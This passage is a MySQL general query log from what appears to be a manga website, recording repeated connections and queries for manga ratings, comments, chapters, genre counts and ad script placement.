count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330649925 Quit 330649926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649926 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330649926 Quit 330649927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649927 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330649927 Quit 330649928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649928 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330649928 Quit 330649929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649929 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330649929 Quit 330649930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649930 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330649930 Quit 330649931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649931 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330649931 Quit 330649932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649932 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330649932 Quit 330649933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649933 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330649933 Quit 330649934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649934 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330649934 Quit 330649935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649935 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330649935 Quit 330649936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330649936 Quit 330649937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330649937 Quit 330649938 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649938 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330649938 Quit 330649939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649939 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330649939 Quit 330649940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649940 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330649940 Quit 330649941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330649941 Quit 330649942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330649942 Quit 330649943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330649943 Quit 330649944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649944 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330649944 Quit 330649945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330649945 Quit 330649946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330649946 Quit 330649947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649947 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330649947 Quit 330649948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649948 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330649948 Quit 330649949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330649949 Quit 330649950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649950 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330649950 Quit 330649951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330649951 Quit 330649952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330649952 Quit 330649953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330649953 Quit 330649954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649954 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330649954 Quit 330649955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649955 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330649955 Quit 330649956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649956 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330649956 Quit 330649957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649957 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330649957 Quit 330649958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649958 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330649958 Quit 330649959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649959 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330649959 Quit 330649960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649960 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330649960 Quit 330649961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649961 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330649961 Quit 330649962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649962 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330649962 Quit 330649963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649963 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330649963 Quit 330649964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330649964 Quit 330649965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649965 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330649965 Quit 330649966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330649966 Quit 330649967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649967 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330649967 Quit 330649968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330649968 Quit 330649969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649969 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330649969 Quit 330649970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330649970 Quit 330649971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649971 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330649971 Quit 330649972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330649972 Quit 330649973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330649973 Quit 330649974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330649974 Quit 330649975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649975 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330649975 Quit 330649976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649976 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330649976 Quit 330649977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330649977 Quit 330649978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330649978 Quit 330649979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330649979 Quit 330649980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330649980 Quit 330649981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649981 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330649981 Quit 330649982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330649982 Quit 330649983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649983 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330649983 Quit 330649984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330649984 Quit 330649985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330649985 Quit 330649986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649986 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330649986 Quit 330649987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649987 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330649987 Quit 330649988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649988 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330649988 Quit 330649989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649989 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330649989 Quit 330649990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649990 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330649990 Quit 330649991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330649991 Quit 330649992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649992 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330649992 Quit 330649993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330649993 Quit 330649994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330649994 Quit 330649995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330649995 Quit 330649996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330649996 Quit 330649997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330649997 Quit 330649998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330649998 Quit 330649999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330649999 Quit 330650000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330650000 Quit 330650001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330650001 Quit 330650002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330650002 Quit 330650003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330650003 Quit 330650004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330650004 Quit 330650005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330650005 Quit 330650006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330650006 Quit 330650007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330650007 Quit 330650008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330650008 Quit 330650009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650009 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330650009 Quit 330650010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330650010 Quit 330650011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330650011 Quit 330650012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330650012 Quit 330650013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330650013 Quit 330650014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650014 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330650014 Quit 330650015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330650015 Quit 330650016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330650016 Quit 330650017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330650017 Quit 330650018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330650018 Quit 330650019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330650019 Quit 330650020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330650020 Quit 330650021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330650021 Quit 330650022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330650022 Quit 330650023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330650023 Quit 330650024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330650024 Quit 330650025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330650025 Quit 330650026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330650026 Quit 330650027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330650027 Quit 330650028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330650028 Quit 330650029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330650029 Quit 330650030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330650030 Quit 330650031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330650031 Quit 330650032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330650032 Quit 330650033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330650033 Quit 330650034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330650034 Quit 330650035 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330650035 Quit 330650036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330650036 Quit 330650037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330650037 Quit 330650038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330650038 Quit 330650039 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330650039 Quit 330650040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330650040 Quit 330650041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330650041 Quit 330650042 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330650042 Quit 330650043 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330650043 Quit 330650044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330650044 Quit 330650045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330650045 Quit 330650046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330650046 Quit 330650047 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650047 Quit 330650048 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330650048 Quit 330649695 Quit 330649684 Quit 330650049 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650049 Query select * FROM comments where manga_id = '74' and parent_id is null order by created desc 330650049 Quit 330650050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650050 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '74' and m.active = 1 330650050 Quit 330650051 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650051 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Comedy%' OR m.genres like '%Drama%' OR m.genres like '%Romance%' OR m.genres like '%School%' OR m.genres like '%Shounen%' OR m.genres like '%Slice of Life%') group by manga_id ORDER BY sum(view) DESC 330650051 Quit 330650052 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650053 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650053 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330650052 Quit 330650053 Quit 330650054 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330650054 Quit 330650055 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650055 Query select * FROM chapters where manga_id = '74' order by created desc limit 1 330650055 Quit 330650056 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330650056 Quit 330650057 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330650057 Quit 330650058 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650058 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330650058 Quit 330650059 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330650059 Quit 330650060 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650060 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330650060 Quit 330650061 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330650061 Quit 330650062 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650062 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330650062 Quit 330650063 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330650063 Quit 330650064 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650064 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330650064 Quit 330650065 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330650065 Quit 330650066 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650066 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330650066 Quit 330650067 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330650067 Quit 330650068 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330650068 Quit 330650069 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330650069 Quit 330650070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330650070 Quit 330650071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330650071 Quit 330650072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330650072 Quit 330650073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330650073 Quit 330650074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330650074 Quit 330650075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650075 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330650075 Quit 330650076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330650076 Quit 330650077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM 